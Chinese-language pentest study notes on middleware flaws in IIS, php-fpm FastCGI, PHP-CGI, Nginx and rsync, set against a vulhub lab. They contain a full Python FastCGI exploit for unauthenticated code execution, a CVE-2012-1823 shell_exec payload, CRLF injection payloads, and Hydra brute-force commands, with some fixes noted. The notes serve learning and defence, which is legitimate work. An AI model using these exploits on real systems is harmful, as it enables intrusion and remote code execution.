IIS7.5文件路径解析漏洞
IIS短文件名机制
dir /x
短文件名猜解:
在C:\Inetpub\wwwroot创建一个aaaaaaaaaa.html文件
外部访问:进行猜解ip/~1***/a.aspx
修复
打开注册表:regedit
漏洞修复 1、升级.net framework
2、修改注册表键值: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSyste m修改NtfsDisable8dot3NameCreation为1
3、将web文件夹的内容拷贝到另一个位置,比如D:\www到 D:\www.back,然后删除原文件夹D:\www,再重命名D:\www.back到 D:\www
FASTCGI
中间件与PHP的结合方式:
CGI
FastCGI
Module
FastCGI Record
FastCGI是一种通信协议,是进行数据交换的通道
类比HTTP协议,FastCGI的record也包含头与体
工作原理:客户端请求服务器,服务器将客户端的请求,设置成FastCGI Record,发送给php-fpm,php-fpm按照FastCGI
的协议将TCP流解析成真正的数据。
中间件将请求按照FastCGI协议要求将内容变成如下的key-value,中间件将key-value发送给服务器,服务器执行SCRIPT_FILENAME指向的文件,进行解析发送回客户端
FastCGI Record
![FastCGI record](C:\Users\admin\Pictures\中间渗透\FastCGI record.PNG)
服务器与php-fpm交互过程,使用FastCGI type
![FastCGI type](C:\Users\admin\Pictures\中间渗透\FastCGI type.PNG)
未授权访问
攻击原理:
攻击者伪造FastCGI请求发送给服务器,构造payload将,将服务器解析路径设置自己可以控制输入的内容。
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
def bchr(i):
if PY2:
return force_bytes(chr(i))
else:
return bytes([i])
def bord(c):
if isinstance(c, int):
return c
else:
return ord(c)
def force_bytes(s):
if isinstance(s, bytes):
return s
else:
return s.encode('utf-8', 'strict')
def force_text(s):
if issubclass(type(s), str):
return s
if isinstance(s, bytes):
s = str(s, 'utf-8', 'strict')
else:
s = str(s)
return s
class FastCGIClient:
"""A Fast-CGI Client for Python"""
# private
__FCGI_VERSION = 1
__FCGI_ROLE_RESPONDER = 1
__FCGI_ROLE_AUTHORIZER = 2
__FCGI_ROLE_FILTER = 3
__FCGI_TYPE_BEGIN = 1
__FCGI_TYPE_ABORT = 2
__FCGI_TYPE_END = 3
__FCGI_TYPE_PARAMS = 4
__FCGI_TYPE_STDIN = 5
__FCGI_TYPE_STDOUT = 6
__FCGI_TYPE_STDERR = 7
__FCGI_TYPE_DATA = 8
__FCGI_TYPE_GETVALUES = 9
__FCGI_TYPE_GETVALUES_RESULT = 10
__FCGI_TYPE_UNKOWNTYPE = 11
__FCGI_HEADER_SIZE = 8
# request state
FCGI_STATE_SEND = 1
FCGI_STATE_ERROR = 2
FCGI_STATE_SUCCESS = 3
def __init__(self, host, port, timeout, keepalive):
self.host = host
self.port = port
self.timeout = timeout
if keepalive:
self.keepalive = 1
else:
self.keepalive = 0
self.sock = None
self.requests = dict()
def __connect(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(self.timeout)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# if self.keepalive:
# self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)
# else:
# self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)
try:
self.sock.connect((self.host, int(self.port)))
except socket.error as msg:
self.sock.close()
self.sock = None
print(repr(msg))
return False
return True
def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
length = len(content)
buf = bchr(FastCGIClient.__FCGI_VERSION) \
+ bchr(fcgi_type) \
+ bchr((requestid >> 8) & 0xFF) \
+ bchr(requestid & 0xFF) \
+ bchr((length >> 8) & 0xFF) \
+ bchr(length & 0xFF) \
+ bchr(0) \
+ bchr(0) \
+ content
return buf
def __encodeNameValueParams(self, name, value):
nLen = len(name)
vLen = len(value)
record = b''
if nLen < 128:
record += bchr(nLen)
else:
record += bchr((nLen >> 24) | 0x80) \
+ bchr((nLen >> 16) & 0xFF) \
+ bchr((nLen >> 8) & 0xFF) \
+ bchr(nLen & 0xFF)
if vLen < 128:
record += bchr(vLen)
else:
record += bchr((vLen >> 24) | 0x80) \
+ bchr((vLen >> 16) & 0xFF) \
+ bchr((vLen >> 8) & 0xFF) \
+ bchr(vLen & 0xFF)
return record + name + value
def __decodeFastCGIHeader(self, stream):
header = dict()
header['version'] = bord(stream[0])
header['type'] = bord(stream[1])
header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
header['paddingLength'] = bord(stream[6])
header['reserved'] = bord(stream[7])
return header
def __decodeFastCGIRecord(self, buffer):
header = buffer.read(int(self.__FCGI_HEADER_SIZE))
if not header:
return False
else:
record = self.__decodeFastCGIHeader(header)
record['content'] = b''
if 'contentLength' in record.keys():
contentLength = int(record['contentLength'])
record['content'] += buffer.read(contentLength)
if 'paddingLength' in record.keys():
skiped = buffer.read(int(record['paddingLength']))
return record
def request(self, nameValuePairs={}, post=''):
if not self.__connect():
print('connect failure! please check your fasctcgi-server !!')
return
requestId = random.randint(1, (1 << 16) - 1)
self.requests[requestId] = dict()
request = b""
beginFCGIRecordContent = bchr(0) \
+ bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
+ bchr(self.keepalive) \
+ bchr(0) * 5
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
beginFCGIRecordContent, requestId)
paramsRecord = b''
if nameValuePairs:
for (name, value) in nameValuePairs.items():
name = force_bytes(name)
value = force_bytes(value)
paramsRecord += self.__encodeNameValueParams(name, value)
if paramsRecord:
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)
if post:
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)
self.sock.send(request)
self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND
self.requests[requestId]['response'] = b''
return self.__waitForResponse(requestId)
def __waitForResponse(self, requestId):
data = b''
while True:
buf = self.sock.recv(512)
if not len(buf):
break
data += buf
data = BytesIO(data)
while True:
response = self.__decodeFastCGIRecord(data)
if not response:
break
if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR
if requestId == int(response['requestId']):
self.requests[requestId]['response'] += response['content']
if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:
self.requests[requestId]
return self.requests[requestId]['response']
def __repr__(self):
return "fastcgi connect host:{} port:{}".format(self.host, self.port)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')
parser.add_argument('host', help='Target host, such as 127.0.0.1')
parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')
parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')
parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)
args = parser.parse_args()
client = FastCGIClient(args.host, args.port, 3, 0)
params = dict()
documentRoot = "/"
uri = args.file
content = args.code
params = {
'GATEWAY_INTERFACE': 'FastCGI/1.0',
'REQUEST_METHOD': 'POST',
'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
'SCRIPT_NAME': uri,
'QUERY_STRING': '',
'REQUEST_URI': uri,
'DOCUMENT_ROOT': documentRoot,
'SERVER_SOFTWARE': 'php/fcgiclient',
'REMOTE_ADDR': '127.0.0.1',
'REMOTE_PORT': '9985',
'SERVER_ADDR': '127.0.0.1',
'SERVER_PORT': '80',
'SERVER_NAME': "localhost",
'SERVER_PROTOCOL': 'HTTP/1.1',
'CONTENT_TYPE': 'application/text',
'CONTENT_LENGTH': "%d" % len(content),
'PHP_VALUE': 'auto_prepend_file = php://input', #设置伪协议控制输入输出
'PHP_ADMIN_VALUE': 'allow_url_include = On' #开启文件包含权限
}
response = client.request(params, content)
print(force_text(response))
攻击方法
1、安装docker
curl -s https://get.docker.com/|sh
查看安装:docker -V
2、安装python-pip
sudo apt-get install pip
3、安装docker-compose
pip install docker-compose
4、将vulhub解压到一个路径下:/vulhub/vulhub-master/进入fpm文件,docker-compose up 启动服务
访问docker ps查看进程,9000映射成功
5、进入docker查看,找一个php文件查看。
6、设置payload
创建fpm.py,
7、执行代码
python fpm.py 10.10.10.131 /etc/passwd
python fpm.py 10.10.10.131 /usr/local/lib/php/PEAR.php
8、利用命令进行任意命令执行复现
python fpm.py 10.10.10.131 /usr/local/lib/php/PEAR.php -c '<?php echo `pwd`; ?>'
python fpm.py 10.10.10.131 /usr/local/lib/php/PEAR.php -c '<?php echo `id`; ?>'
PHPCGI远程代码执行
PHP-CGI是php自带的FastCGI管理器,PHP-CGI的不足
1、PHP-CGI变更php.in配置后需重启php-cgi才能让新的php-ini生效,不可以平滑重启
2、直接杀死php-cgi进程php就不能运行了。PHP-FPM和Spawn-FCGI就没有这个问题,守护进程会平滑从新生成新的子进程。
CGI是一个中间件
CGI通用网关接口,能够让服务器方便的调用外部程序
CGI:用户每发送一个请求,CGI都会创建一个子进程执行请求,将执行结果返回给用户,然后结束子进程
导致CGI模式运行的网站不能同时接受大量请求
FastCGI:将进程一直运行在后台,接收数据包,执行后返回结果,自身不退出
CGI模式下的参数:
-c指定php.ini文件的位置
-n不要加载php.ini文件
-d指定配置项
-b启动fastcgi进程
-s显示文件源码
-T执行指定次该文件
-h-?显示帮助
CVE-2012-1823
漏洞成因
将if(!cgi)getopt(…)在配置文件中被删除了 不允许执行外来变量
构造payload
POST /index.php?-d+allow_url_include%3don±d+auto_prepend_file%3dphp%3a//input HTTP/1.1
<?php echo shell_exec("id");?>CVE-2012-2311
新版本5.4.2及5.3.12,但这个修复不是完全的,可以绕过,进而衍生出CVE-2012-2311漏洞
通过使用空白加-的方式,也能传入参数。这时候第一个字符就是空白符而不是-了,绕过了上述检查。于是,php5.4.3和php5.3.13中继续进行修改先跳过所有空白符(小于等于空格的所有字符),再判断第一个字符是否是-
Spawn-FCGI
Spawn-FCGI是一个通用的FastCGI管理服务器,它是lighttpd中的一部分,很多人都用Lighttpd的Spawn-FCGI模式的管理工作,不过有不少缺点。而PHP-FPM的出现多少缓解了一些问题,但PHP-FPM有个缺点就是要重新编译,这对于一些已经运行的环境有可能有不小的风险,在php 5.3.3中可以直接使用PHP-FPM了。Spawn-FCGI的代码很少,全部才630行,用c语言编写,最近一次提交是5年前。代码主页:https://github.com/lighttpd/spawn-fcgi
代码分析
1、spawn-fcgi 首先create socket,bind,listen 3步创建服务器socket,(把这个socket叫做 fcgi_fd)
2、用dup2,把fcgi_fd 交换给 FCGI_LISTENSOCK_FILENO (FCGI_LISTENSOCK_FILENO数值上等于0,这是fastcgi协议当中指定用来listen的socket id)
3执行execl ,replaces the current process image with a new process image. process image 进程在运行空间的代码段
Nginx配置不当
http://www.baidu.com -> https://www.baidu.com
baidu.com->https://www.baidu.com
nginx配置文件
$uri:解码后请求路径,不含
$document_uri:解码后请求路径,不含参数
$request_uri:完整的URI,不解码
查看Nginx配置文件cat /etc/nginx/conf.d/error1.conf
配置文件目录:~/vulhub-master/nginx/insecure-configuration/configuration
漏洞成因:
CRLR是"回车+换行"(\r\n)的简称
HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器根据两个CRLF来取出HTTP内容并显示出来
通过控制HTTP消息头中的字符,注入一些恶意的换行,就能注入一些会话Cookie或者HTML代码
CRLF注入
正常跳转页面
会话固定:
10.10.10.131:8080%0aSet-cookie:JSPSESSID%3D360
反射型XSS
10.10.10.131:8080/%0d%0a%0d%0a
![nginx error1反射型](C:\Users\admin\Pictures\中间渗透\nginx error1反射型.PNG)
为什么不会弹窗?
浏览器FIilter对XSS特征进行了过滤,并且浏览器进行了跳转
如何组织浏览器跳转,参考链接:
https://www.leavesongs.com/PENETRATION/bottle-crlf-cve-2016-9964.html
https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html
修复方法
使用不解析的URI跳转
$request_uri:完整的URI,不解码
另任何可以设置HTTP头的场景都会出现CRLF注入问题
目录穿越
漏洞成因:
修复方法:
location /files/ {
alias /home/;
}
Hydra爆破
hydra常用语法
hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://loaclhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://loaclhost/
ssh爆破:
hydra -L user.txt -P password.txt ssh://10.10.10.131
VNC爆破:
hydra -P password.txt vnc://10.10.10.131
Mysql爆破:
hydra L user.txt -P password.txt mysql://10.10.10.131
web登录爆破
hydra -l admin -P password.txt http-get://10.10.10.131/login.html
目录: /etc/crontab crontab 虚拟机计划任务
rsync非授权访问
修复:
hosts allow=127.0.0.1 允许指定ip
设置用户名密码:
auth users=rsync
secret file=/etc/rsyncd.passwd
/etc/rsyncd.passwd 需手动创建,格式为username:password